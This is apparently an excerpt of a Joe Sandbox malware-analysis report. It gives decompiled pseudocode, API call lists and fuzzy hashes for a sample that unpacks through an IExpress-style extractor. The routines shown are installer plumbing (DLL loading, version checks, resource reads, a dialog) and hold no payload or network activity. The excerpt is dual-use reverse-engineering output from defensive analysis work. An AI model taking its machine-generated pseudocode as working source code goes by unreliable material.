                                                                                                                                                                                                                                                				_t27 = __esi;
                                                                                                                                                                                                                                                				_t18 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				E010E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                                                                				_t26 = "advpack.dll";
                                                                                                                                                                                                                                                				E010E658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                                				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                                				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E64DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E64F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E6502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-3856989675
                                                                                                                                                                                                                                                • Opcode ID: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                                                                                                                                                                                                                                                • Instruction ID: 9f91c51db5aa6aae658b93e98363e502b4d983628b79eeef358e2f9cbdae847c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73e6d5fb6f219a5ba4998a24d9ea374daa50e85b26edadfaa9c0cc9444596b3e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0401A231A001089FD7A4EB66EC4CAEA77F8EB64710F400199B5C597184DE76AA858B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				char* _v12;
                                                                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                                                				intOrPtr _v24;
                                                                                                                                                                                                                                                				int _v28;
                                                                                                                                                                                                                                                				int _v32;
                                                                                                                                                                                                                                                				void* _v36;
                                                                                                                                                                                                                                                				int _v40;
                                                                                                                                                                                                                                                				void* _v44;
                                                                                                                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                                                                                                                				intOrPtr _v52;
                                                                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                                                                				intOrPtr _v60;
                                                                                                                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                                                                                                                				long _t68;
                                                                                                                                                                                                                                                				void* _t70;
                                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                                				void* _t79;
                                                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                                                				void* _t87;
                                                                                                                                                                                                                                                				void* _t88;
                                                                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                                                                				intOrPtr _t97;
                                                                                                                                                                                                                                                				intOrPtr _t99;
                                                                                                                                                                                                                                                				int _t101;
                                                                                                                                                                                                                                                				void* _t103;
                                                                                                                                                                                                                                                				void* _t106;
                                                                                                                                                                                                                                                				void* _t109;
                                                                                                                                                                                                                                                				void* _t110;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v12 = __edx;
                                                                                                                                                                                                                                                				_t99 = __ecx;
                                                                                                                                                                                                                                                				_t106 = 0;
                                                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                                                				_t87 = 0;
                                                                                                                                                                                                                                                				_t103 = 0;
                                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                                				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                                					L19:
                                                                                                                                                                                                                                                					_t106 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t62 = 0;
                                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                                						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                                						if(E010E2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                                							goto L20;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                                						_v28 = _t68;
                                                                                                                                                                                                                                                						if(_t68 == 0) {
                                                                                                                                                                                                                                                							_t99 = _v16;
                                                                                                                                                                                                                                                							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                                							_t93 = _v24;
                                                                                                                                                                                                                                                							_t87 = _v20;
                                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                                								goto L18;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                                							if(_t103 != 0) {
                                                                                                                                                                                                                                                								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                                								_v36 = _t73;
                                                                                                                                                                                                                                                								if(_t73 != 0) {
                                                                                                                                                                                                                                                									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                                										L15:
                                                                                                                                                                                                                                                										GlobalUnlock(_t103);
                                                                                                                                                                                                                                                										_t99 = _v16;
                                                                                                                                                                                                                                                										L18:
                                                                                                                                                                                                                                                										_t87 = _t87 + 1;
                                                                                                                                                                                                                                                										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										_v20 = _t87;
                                                                                                                                                                                                                                                										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                                										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                                											continue;
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                                										_t79 = _v44;
                                                                                                                                                                                                                                                										_t88 = _t106;
                                                                                                                                                                                                                                                										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                                										_t101 = _v28;
                                                                                                                                                                                                                                                										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                                										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                                										_t97 = _v48;
                                                                                                                                                                                                                                                										_v36 = _t83;
                                                                                                                                                                                                                                                										_t109 = _t83;
                                                                                                                                                                                                                                                										do {
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                                											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010E2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                                											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                                											_t88 = _t88 + 4;
                                                                                                                                                                                                                                                										} while (_t88 < 8);
                                                                                                                                                                                                                                                										_t87 = _v20;
                                                                                                                                                                                                                                                										_t106 = 0;
                                                                                                                                                                                                                                                										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                                											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                                												GlobalUnlock(_t103);
                                                                                                                                                                                                                                                											} else {
                                                                                                                                                                                                                                                												goto L15;
                                                                                                                                                                                                                                                											}
                                                                                                                                                                                                                                                										} else {
                                                                                                                                                                                                                                                											goto L15;
                                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						goto L20;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				L20:
                                                                                                                                                                                                                                                				 *_a8 = _t87;
                                                                                                                                                                                                                                                				if(_t103 != 0) {
                                                                                                                                                                                                                                                					GlobalFree(_t103);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t106;
                                                                                                                                                                                                                                                			}
                                                                                                                                                                                                                                                0x010e2a4c
                                                                                                                                                                                                                                                0x010e2a4f
                                                                                                                                                                                                                                                0x010e2a50
                                                                                                                                                                                                                                                0x010e2a53
                                                                                                                                                                                                                                                0x010e2a56
                                                                                                                                                                                                                                                0x010e2a5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e29b2
                                                                                                                                                                                                                                                0x010e29b2
                                                                                                                                                                                                                                                0x010e29b5
                                                                                                                                                                                                                                                0x010e29bd
                                                                                                                                                                                                                                                0x010e29c3
                                                                                                                                                                                                                                                0x010e29cc
                                                                                                                                                                                                                                                0x010e29d5
                                                                                                                                                                                                                                                0x010e29d7
                                                                                                                                                                                                                                                0x010e29da
                                                                                                                                                                                                                                                0x010e29dd
                                                                                                                                                                                                                                                0x010e29df
                                                                                                                                                                                                                                                0x010e29ec
                                                                                                                                                                                                                                                0x010e29f8
                                                                                                                                                                                                                                                0x010e29fc
                                                                                                                                                                                                                                                0x010e29ff
                                                                                                                                                                                                                                                0x010e2a02
                                                                                                                                                                                                                                                0x010e2a07
                                                                                                                                                                                                                                                0x010e2a0a
                                                                                                                                                                                                                                                0x010e2a0f
                                                                                                                                                                                                                                                0x010e2a19
                                                                                                                                                                                                                                                0x010e2a81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2a0f
                                                                                                                                                                                                                                                0x010e298c
                                                                                                                                                                                                                                                0x010e2974
                                                                                                                                                                                                                                                0x010e2962
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e294f
                                                                                                                                                                                                                                                0x010e2912
                                                                                                                                                                                                                                                0x010e2a65
                                                                                                                                                                                                                                                0x010e2a68
                                                                                                                                                                                                                                                0x010e2a6c
                                                                                                                                                                                                                                                0x010e2a6f
                                                                                                                                                                                                                                                0x010e2a6f
                                                                                                                                                                                                                                                0x010e2a7d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 010E2A6F
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharUpperA.USER32(71A8563C,00000000,00000000,00000000), ref: 010E27A8
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharNextA.USER32(0000054D), ref: 010E27B5
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: CharNextA.USER32(00000000), ref: 010E27BC
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2829
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2852
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E2870
                                                                                                                                                                                                                                                  • Part of subcall function 010E2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010E28A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005), ref: 010E2958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 010E2969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010E3938,?,?,?,?,-00000005,?), ref: 010E2A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010E2A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                                                                                                                                                                                                                                                • Instruction ID: 9e077d0d352446e8b4a0058ce8ea4487db58af8a6c8ba33bf9875b1fce185c9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d0d4da64087f1a7b386e4707aceab764fa264d8b3ae007d387a700f347d04f0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3513E31E00219DFDB25DF9AC888AAEFBF9FF48700F18416AE995E7211D7359941CB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E010E4169(void* __eflags) {
                                                                                                                                                                                                                                                				int _t18;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t20 = E010E468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                                				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                                					if(E010E468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                                						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                                							L7:
                                                                                                                                                                                                                                                							return LocalFree(_t21);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(0x40);
                                                                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                                                                						_push(_t21);
                                                                                                                                                                                                                                                						_t18 = 0x3e9;
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						E010E44B9(0, _t18);
                                                                                                                                                                                                                                                						goto L7;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0x10);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                                                                					_t18 = 0x4b1;
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E4189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010E30B4), ref: 010E41E7
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
• Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                                                                                                                                                                                                                                                • Instruction ID: 60e6e793b66560f2ac8dcf9c844decc26569ee38ba34352c021fb904f5b26d76
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1683d704414b35d4daca7114a543ff4bc830d8642040fbf4e6c0362a113f1687
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F01ADB1700215BFF7291A6B8C8DFBB65CEDBD8A95F0040A9B785E61849AB9CC0141B5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E7155() {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				struct _FILETIME _v16;
                                                                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                                                                				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                                                                				signed int _t23;
                                                                                                                                                                                                                                                				signed int _t36;
                                                                                                                                                                                                                                                				signed int _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                                                                				_t23 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                                                                					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                                                                					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                                                                					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                                                                					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                                                                					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                                                                					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                                                                					_t39 = _t36;
                                                                                                                                                                                                                                                					if(_t36 == 0xbb40e64e || ( *0x10e8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                                                                						_t36 = 0xbb40e64f;
                                                                                                                                                                                                                                                						_t39 = 0xbb40e64f;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					 *0x10e8004 = _t39;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t37 =  !_t36;
                                                                                                                                                                                                                                                				 *0x10e8008 = _t37;
                                                                                                                                                                                                                                                				return _t37;
                                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 010E7182
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 010E7191
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 010E719A
                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 010E71A3
                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 010E71B8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1445889803-0
                                                                                                                                                                                                                                                • Opcode ID: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                                                                                                                                                                                                                                                • Instruction ID: 4b8449008859c847cf3a163ef4e382dfca948fc55b83a7d7be811277e8f9b286
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2111C71E01208DFCB60DFBAD648A9EBBF5EF48755F614896E945EB204E639DA008B40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v520;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				struct HWND__* _t34;
                                                                                                                                                                                                                                                				signed int _t35;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t27 = __ebx;
                                                                                                                                                                                                                                                				_t11 =  *0x10e8004; // 0x71a8563c
                                                                                                                                                                                                                                                				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                                				_t34 = _a4;
                                                                                                                                                                                                                                                				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                                					E010E43D0(_t34, _t15);
                                                                                                                                                                                                                                                					_v520 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x10e9a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                                					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                                					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                                					goto L6;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					if(_t14 != 1) {
                                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                                						_t23 = 0;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						_t32 = _a12;
                                                                                                                                                                                                                                                						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							_t23 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E010E6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 010E1A18
                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 010E1A24
                                                                                                                                                                                                                                                • LoadStringA.USER32(?,?,00000200), ref: 010E1A4F
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 010E1A62
                                                                                                                                                                                                                                                • MessageBeep.USER32(000000FF), ref: 010E1A6A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1273765764-0
